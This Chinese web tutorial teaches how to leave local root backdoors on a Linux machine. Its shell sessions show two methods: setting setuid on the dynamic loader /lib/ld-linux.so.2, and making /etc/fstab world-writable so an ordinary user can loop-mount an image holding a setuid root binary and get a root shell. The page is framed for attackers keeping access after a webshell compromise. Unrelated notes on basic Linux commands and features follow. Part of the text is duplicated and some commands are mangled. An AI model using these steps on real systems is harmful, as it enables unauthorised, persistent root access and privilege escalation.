Linux支持多用戶，各個(gè)用戶對(duì)于自己的文件設(shè)備有自己特殊的權(quán)利，保證了各用戶之間互不影響，有時(shí)為了便利或者某些安全需要，我們需要在本地留下后門，那么下面一起看看linux下留本地后門的兩個(gè)方法。

　　方法步驟

　　方法一：setuid的方法，其實(shí)8是很隱蔽?？纯催^程: [root@localdomain lib]# ls -l |grep ld-linux lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu

　　方法一：setuid的方法，其實(shí)8是很隱蔽?？纯催^程:

　　[root@localdomain lib]# ls -l |grep ld-linux

　　lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

　　lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2

　　[root@localdomain lib]# chmod s ld-linux.so.2

　　[root@localdomain lib]# ls -l |grep ld-2.7.so

　　-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so

　　lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so

　　[root@localdomain lib]#

　　我們這里給/lib/ld-linux.so.2這個(gè)文件(在FC8里，它指向ld-2.7.so這個(gè)文件)加了setuid屬性。然后我們看怎么利用它。

　　普通用戶登錄，測(cè)試下權(quán)限：

　　[xiaoyu@localdomain ~]$ whoami

　　xiaoyu

　　[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`

　　root

　　[xiaoyu@localdomain ~]$

　　恩，嘿嘿 root了吧，具體怎么生成root shell，你們自己去想吧，凡事都不要點(diǎn)得太透，對(duì)吧。呵呵，可以肯定的一點(diǎn)，/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell， bash檢查euid 和uid，看是否相等...OK，不多說了。

　　方法二：

　　看過程:

　　[root@localdomain etc]# chmod a w /etc/fstab

　　[root@localdomain etc]#

　　這就留好了。此方法比較XXOXX，估計(jì)沒幾個(gè)管理員知道。利用方法演示下

　　[xiaoyu@localdomain ~]$ ls -l /etc/fstab

　　-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab

　　[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab

　　然后從本機(jī)把一個(gè)文件到目標(biāo)機(jī)器上去，這里我們命名為test

　　[xiaoyu@localdomain tmp]$ ls -l test

　　-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test

　　[xiaoyu@localdomain tmp]$ mount test

　　[xiaoyu@localdomain tmp]$ cd /mnt

　　[xiaoyu@localdomain mnt]$ ls -l

　　total 18

　　drwx------ 2 root root 12288 2008-04-20 05:44 lost found

　　-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root

　　[xiaoyu@localdomain mnt]$ ./root

　　sh-3.2#

　　看到了吧，從普通用戶提升到root了。呵呵。

　　test這個(gè)文件baidu貌似木有上傳功能撒，木辦法傳

　　貌似可能有人說本地后門木啥鳥用，但是你要搞清楚：一個(gè)webshell里面就可以完成這一切....

　　補(bǔ)充：Linux基本命令

　　1.ls命令：

　　格式：：ls [選項(xiàng)] [目錄或文件]

　　功能：對(duì)于目錄，列出該目錄下的所有子目錄與文件;對(duì)于文件，列出文件名以及其他信息。

　　常用選項(xiàng)：

　　-a ：列出目錄下的所有文件，包括以 . 開頭的隱含文件。

　　-d ：將目錄像文件一樣顯示，而不是顯示其他文件。

　　-i ：輸出文件的i節(jié)點(diǎn)的索引信息。

　　-k ：以k字節(jié)的形式表示文件的大小。

　　-l ：列出文件的詳細(xì)信息。

　　-n ：用數(shù)字的UID,GID代替名稱。

　　-F : 在每個(gè)文件名后面附上一個(gè)字符以說明該文件的類型，“*”表示可執(zhí)行的普通文 件;“/”表示目錄;“@”表示符號(hào)鏈接;“l”表示FIFOS;“=”表示套接字。

　　2.cd命令

　　格式：cd [目錄名稱]

　　常用選項(xiàng)：

　　cd .. 返回上一級(jí)目錄。

　　cd ../.. 將當(dāng)前目錄向上移動(dòng)兩級(jí)。

　　cd - 返回最近訪問目錄。

　　3.pwd命令

　　格式： pwd

　　功能：顯示出當(dāng)前工作目錄的絕對(duì)路徑。

　　相關(guān)閱讀：Linux主要特性

　　完全兼容POSIX1.0標(biāo)準(zhǔn)

　　這使得可以在Linux下通過相應(yīng)的模擬器運(yùn)行常見的DOS、Windows的程序。這為用戶從Windows轉(zhuǎn)到Linux奠定了基礎(chǔ)。許多用戶在考慮使用Linux時(shí)，就想到以前在Windows下常見的程序是否能正常運(yùn)行，這一點(diǎn)就消除了他們的疑慮。

　　多用戶、多任務(wù)

　　Linux支持多用戶，各個(gè)用戶對(duì)于自己的文件設(shè)備有自己特殊的權(quán)利，保證了各用戶之間互不影響。多任務(wù)則是現(xiàn)在電腦最主要的一個(gè)特點(diǎn)，Linux可以使多個(gè)程序同時(shí)并獨(dú)立地運(yùn)行。

　　良好的界面

　　Linux同時(shí)具有字符界面和圖形界面。在字符界面用戶可以通過鍵盤輸入相應(yīng)的指令來進(jìn)行操作。它同時(shí)也提供了類似Windows圖形界面的X-Window系統(tǒng)，用戶可以使用鼠標(biāo)對(duì)其進(jìn)行操作。在X-Window環(huán)境中就和在Windows中相似，可以說是一個(gè)Linux版的Windows。

　　支持多種平臺(tái)

　　Linux可以運(yùn)行在多種硬件平臺(tái)上，如具有x86、680x0、SPARC、Alpha等處理器的平臺(tái)。此外Linux還是一種嵌入式操作系統(tǒng)，可以運(yùn)行在掌上電腦、機(jī)頂盒或游戲機(jī)上。2001年1月份發(fā)布的Linux 2.4版內(nèi)核已經(jīng)能夠完全支持Intel 64位芯片架構(gòu)。同時(shí)Linux也支持多處理器技術(shù)。多個(gè)處理器同時(shí)工作，使系統(tǒng)性能大大提高。

linux下留本地后門相關(guān)文章：

1.有哪些方法可以檢查L(zhǎng)inux是否被入侵

2.如何實(shí)現(xiàn)linux操作系統(tǒng)對(duì)計(jì)算機(jī)病毒的防護(hù)

3.PHP后門原理實(shí)現(xiàn)是怎樣的

4.Linux系統(tǒng)被入侵該如何檢測(cè)

5.Linux操作系統(tǒng)的基本安全措施